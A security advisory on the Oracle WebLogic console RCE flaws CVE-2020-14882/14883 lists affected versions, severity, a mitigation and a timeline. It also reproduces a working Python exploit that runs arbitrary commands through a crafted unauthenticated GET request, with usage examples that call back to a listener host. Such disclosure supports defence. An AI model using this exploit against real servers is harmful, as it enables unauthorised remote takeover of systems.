¡¾¸üС¿CVE-2020-14882 | WebLogicÔ¶³Ì´úÂëÖ´Ðзì϶¹«¸æ

Published 2020-10-30

0x00 Vulnerability Overview

CNVD ID: CVE-2020-14882
Date: 2020-10-30
Type: RCE
Severity: High
Remotely exploitable: Yes
Affected scope: see 0x01 Vulnerability Details

WebLogic Server is one of the major products of the US company Oracle. It is mainly used to develop, integrate, deploy and manage large distributed web applications, network applications and database applications, and is one of the major commercial Java (J2EE) application servers on the market.

 

0x01 Vulnerability Details


 

On October 28, 2020, a POC for the Oracle WebLogic Server remote code execution vulnerability (CVE-2020-14882), which had been fixed in Oracle's October security update, was made public. A remote attacker can trigger it with a single malicious HTTP GET request. An attacker who successfully exploits this vulnerability can take control of the WebLogic Server Console without authentication and execute arbitrary code.

On October 29, 2020, it was disclosed that Oracle's patch for CVE-2020-14882 can be bypassed by a 0day vulnerability: even after the WebLogic patch has been applied, an attacker can still bypass restrictions such as the WebLogic admin console login and take control of the WebLogic server. The resulting risk is extremely high. Vulnerability details are as follows:

Vulnerability ID   Product                  Component   Score (CVSS)   Affected versions
CVE-2020-14882     Oracle WebLogic Server   Console     9.8            10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0
CVE-2020-14883     Oracle WebLogic Server   Console     7.2            10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0

 

The related EXP is as follows:

 

#!/usr/bin/python3

# Exploit Title: Oracle WebLogic Server 10.3.6.0.0 / 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0  - Unauthenticated RCE via GET request
# Exploit Author: Nguyen Jang
# CVE: CVE-2020-14882
# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html
# Software Link: https://www.oracle.com/technetwork/middleware/downloads/index.html

# More Info: https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf

import requests
import sys

from urllib3.exceptions import InsecureRequestWarning

if len(sys.argv) != 3:
    print("[+] WebLogic Unauthenticated RCE via GET request")
    print("[+] Usage : python3 exploit.py http(s)://target:7001 command")
    print("[+] Example1 : python3 exploit.py http(s)://target:7001 \"nslookup your_Domain\"")
    print("[+] Example2 : python3 exploit.py http(s)://target:7001 \"powershell.exe -c Invoke-WebRequest -Uri http://your_listener\"")
    exit()

target = sys.argv[1]
command = sys.argv[2]

request = requests.session()
headers = {'Content-type': 'application/x-www-form-urlencoded; charset=utf-8'}

print("[+] Sending GET Request ....")

GET_Request = request.get(target + "/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"java.lang.Runtime.getRuntime().exec('" + command + "');\");", verify=False, headers=headers)

print("[+] Done !!")

 

0x02 Remediation Recommendations

Temporary measures:

Because the patch for this vulnerability is at risk of being bypassed, it is recommended to temporarily disable external access to the admin console /console/console.portal.


0x03 References

https://www.oracle.com/security-alerts/cpuoct2020.html

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14882

https://packetstormsecurity.com/files/159769/Oracle-WebLogic-Server-Remote-Code-Execution.html


0x04 Timeline

2020-10-20  Oracle released its security advisory

2020-10-21  VSRC released the October patch update security advisory

2020-10-28  Vulnerability POC made public

2020-10-29  Patch bypass 0day disclosed

2020-10-30  VSRC released this security advisory

 

0x05 Appendix

 

CVSS scoring standard (official site): http://www.first.org/cvss/

 

 

 
